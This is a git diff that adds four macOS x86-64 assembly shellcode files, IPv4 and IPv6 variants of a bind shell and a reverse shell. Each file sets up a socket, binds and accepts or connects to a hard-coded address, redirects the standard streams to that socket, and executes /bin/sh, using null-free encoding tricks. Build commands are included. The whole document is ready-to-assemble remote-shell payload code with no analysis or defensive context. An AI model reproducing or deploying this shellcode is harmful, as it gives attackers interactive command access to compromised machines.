diff --git a/macosx-ipv4bind.s b/macosx-ipv4bind.s new file mode 100644 index 0000000..aac2aa5 --- /dev/null +++ b/macosx-ipv4bind.s @@ -0,0 +1,79 @@ +;nasm -f macho64 -o ipv4bind.o ipv4bind.s && ld -macosx_version_min 10.7.0 -o ipv4bind ipv4bind.o + +BITS 64 + +section .text + +global start + +start: + ; socket(AF_INET4, SOCK_STREAM, IPPROTO_IP) + xor rdi, rdi + mul rdi + mov dil, 0x2 + xor rsi, rsi + mov sil, 0x1 + mov al, 0x2 + ror rax, 0x28 + mov r8, rax + mov al, 0x61 + syscall + + ; struct sockaddr_in { + ; __uint8_t sin_len; + ; sa_family_t sin_family; + ; in_port_t sin_port; + ; struct in_addr sin_addr; + ; char sin_zero[8]; + ; }; + mov rsi, 0xffffffffa3eefdf0 + neg rsi + push rsi + push rsp + pop rsi + + ; bind(host_sockid, &sockaddr, 16) + mov rdi, rax + xor dl, 0x10 + mov rax, r8 + mov al, 0x68 + syscall + + ; listen(host_sockid, 2) + xor rsi, rsi + mov sil, 0x2 + mov rax, r8 + mov al, 0x6a + syscall + + ; accept(host_sockid, 0, 0) + xor rsi, rsi + xor rdx, rdx + mov rax, r8 + mov al, 0x1e + syscall + + mov rdi, rax + mov sil, 0x3 + +dup2: + ; dup2(client_sockid, 2) + ; -> dup2(client_sockid, 1) + ; -> dup2(client_sockid, 0) + mov rax, r8 + mov al, 0x5a + sub sil, 1 + syscall + test rsi, rsi + jne dup2 + + ; execve("//bin/sh", 0, 0) + push rsi + mov rdi, 0x68732f6e69622f2f + push rdi + push rsp + pop rdi + mov rax, r8 + mov al, 0x3b + syscall + \ No newline at end of file diff --git a/macosx-ipv4rev.s b/macosx-ipv4rev.s new file mode 100644 index 0000000..835e2f9 --- /dev/null +++ b/macosx-ipv4rev.s @@ -0,0 +1,66 @@ +;nasm -f macho64 -o ipv4rev.o ipv4rev.s && ld -macosx_version_min 10.7.0 -o ipv4rev ipv4rev.o + +BITS 64 + +section .text + +global start + +start: + ; socket(AF_INET4, SOCK_STREAM, IPPROTO_IP) + xor rdi, rdi + mul rdi + mov dil, 0x2 + xor rsi, rsi + mov sil, 0x1 + mov al, 0x2 + ror rax, 0x28 + mov r8, rax + mov al, 0x61 + syscall + + ; struct sockaddr_in { + ; __uint8_t sin_len; + ; sa_family_t sin_family; + ; in_port_t sin_port; + ; struct in_addr sin_addr; + ; char sin_zero[8]; + ; }; + mov rsi, 0xfeffff80a3eefdf0 + neg rsi + push rsi + push rsp + pop rsi + + ; connect(sockid, &sockaddr, 16) + mov rdi, rax + xor dl, 0x10 + mov rax, r8 + mov al, 0x62 + syscall + + xor rsi, rsi + mov sil, 0x3 + +dup2: + ; dup2(sockid, 2) + ; -> dup2(sockid, 1) + ; -> dup2(sockid, 0) + mov rax, r8 + mov al, 0x5a + sub sil, 1 + syscall + test rsi, rsi + jne dup2 + + ; execve("//bin/sh", 0, 0) + push rsi + mov rdi, 0x68732f6e69622f2f + push rdi + push rsp + pop rdi + xor rdx, rdx + mov rax, r8 + mov al, 0x3b + syscall + \ No newline at end of file diff --git a/macosx-ipv6bind.s b/macosx-ipv6bind.s new file mode 100644 index 0000000..54446a2 --- /dev/null +++ b/macosx-ipv6bind.s @@ -0,0 +1,83 @@ +;nasm -f macho64 -o ipv6bind.o ipv6bind.s && ld -macosx_version_min 10.7.0 -o ipv6bind ipv6bind.o + +BITS 64 + +section .text + +global start + +start: + ; socket(AF_INET6, SOCK_STREAM, IPPROTO_IP) + xor rdi, rdi + mul rdi + mov dil, 0x1e + xor rsi, rsi + mov sil, 0x1 + mov al, 0x2 + ror rax, 0x28 + mov r8, rax + mov al, 0x61 + syscall + + ; struct sockaddr_in6 { + ; __uint8_t sin6_len; + ; sa_family_t sin6_family; + ; in_port_t sin6_port; + ; __uint32_t sin6_flowinfo; + ; struct in6_addr sin6_addr; + ; __uint32_t sin6_scope_id; + ; }; + xor rsi, rsi + push rsi + push rsi + push rsi + mov rsi, 0xffffffffa3eee1e4 + neg rsi + push rsi + push rsp + pop rsi + + ; bind(host_sockid, &sockaddr, 28) + mov rdi, rax + xor dl, 0x1c + mov rax, r8 + mov al, 0x68 + syscall + + ; listen(host_sockid, 2) + xor rsi, rsi + mov sil, 0x2 + mov rax, r8 + mov al, 0x6a + syscall + + ; accept(host_sockid, 0, 0) + xor rsi, rsi + xor rdx, rdx + mov rax, r8 + mov al, 0x1e + syscall + + mov rdi, rax + mov sil, 0x3 + + ; dup2(client_sockid, 2) + ; -> dup2(client_sockid, 1) + ; -> dup2(client_sockid, 0) + dup2: + mov rax, r8 + mov al, 0x5a + sub sil, 1 + syscall + test rsi, rsi + jne dup2 + + ; execve("//bin/sh", 0, 0) + push rsi + mov rdi, 0x68732f6e69622f2f + push rdi + push rsp + pop rdi + mov rax, r8 + mov al, 0x3b + syscall diff --git a/macosx-ipv6rev.s b/macosx-ipv6rev.s new file mode 100644 index 0000000..24adf4a --- /dev/null +++ b/macosx-ipv6rev.s @@ -0,0 +1,73 @@ +;nasm -f macho64 -o ipv6rev.o ipv6rev.s && ld -macosx_version_min 10.7.0 -o ipv6rev ipv6rev.o + +BITS 64 + +section .text + +global start + +start: + ; socket(AF_INET6, SOCK_STREAM, IPPROTO_IP) + xor rdi, rdi + mul rdi + mov dil, 0x1e + xor rsi, rsi + mov sil, 0x1 + mov al, 0x2 + ror rax, 0x28 + mov r8, rax + mov al, 0x61 + syscall + + ; struct sockaddr_in6 { + ; __uint8_t sin6_len; + ; sa_family_t sin6_family; + ; in_port_t sin6_port; + ; __uint32_t sin6_flowinfo; + ; struct in6_addr sin6_addr; + ; __uint32_t sin6_scope_id; + ; }; + xor rsi, rsi + push rsi + mov rbx, 0xfeffffffffffffff + not rbx + push rbx + push rsi + mov rsi, 0xffffffffa3eee1e4 + neg rsi + push rsi + push rsp + pop rsi + + ; connect(sockid, &sockaddr, 28) + mov rdi, rax + xor dl, 0x1c + mov rax, r8 + mov al, 0x62 + syscall + + xor rsi, rsi + mov sil, 0x3 + +dup2: + ; dup2(sockid, 2) + ; -> dup2(sockid, 1) + ; -> dup2(sockid, 0) + mov rax, r8 + mov al, 0x5a + sub sil, 1 + syscall + test rsi, rsi + jne dup2 + + ; execve("//bin/sh", 0, 0) + push rsi + mov rdi, 0x68732f6e69622f2f + push rdi + push rsp + pop rdi + xor rdx, rdx + mov rax, r8 + mov al, 0x3b + syscall + \ No newline at end of file